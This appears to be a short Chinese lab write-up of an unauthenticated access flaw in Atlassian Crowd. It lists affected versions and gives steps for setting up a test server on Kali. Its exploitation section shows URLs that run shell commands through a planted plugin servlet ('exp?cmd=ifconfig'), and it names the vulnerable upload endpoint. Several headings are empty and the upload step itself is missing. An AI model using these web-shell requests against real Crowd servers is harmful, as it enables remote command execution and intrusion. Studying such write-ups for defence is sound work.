未授权访问漏洞之Atlassian Crowd
0x01漏洞简述
0x02风险等级
0x03漏洞详情
0x04影响版本
3.1.0 <= version < 3.1.6
3.2.0 <= version < 3.2.8
3.3.0 <= version < 3.3.5
3.4.0 <= version < 3.4.4
0x05环境搭建
攻击机:kali 5.5.0
wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip
sudo apt-get install openjdk-8-jdk
java -version
unzip atlassian-crowd-3.4.3.zip
sudo cp -r atlassian-crowd-3.4.3 /var/
cd /var/atlassian-crowd-3.4.3/crowd-webapp/WEB-INF/classes/
crowd.home=/var/atlassian-crowd-3.4.3#修改配置文件sudo vi crowd-init.properties 添加crowd.home=/var/atlassian-crowd-3.4.3
8. 开启服务
sudo sh start_crowd.sh
http://172.16.16.213:8095/
进入官网https://my.atlassian.com/products/index,点击New Trial License申请key
0x06漏洞利用
url:http://172.16.16.213:8095/crowd/plugins/servlet/exp?cmd=ifconfig
http://172.16.16.213:8095/crowd/plugins/servlet/exp?cmd=命令
0x07修复建议
https://www.atlassian.com/zh/software/crowd
/crowd/admin/uploadplugin.action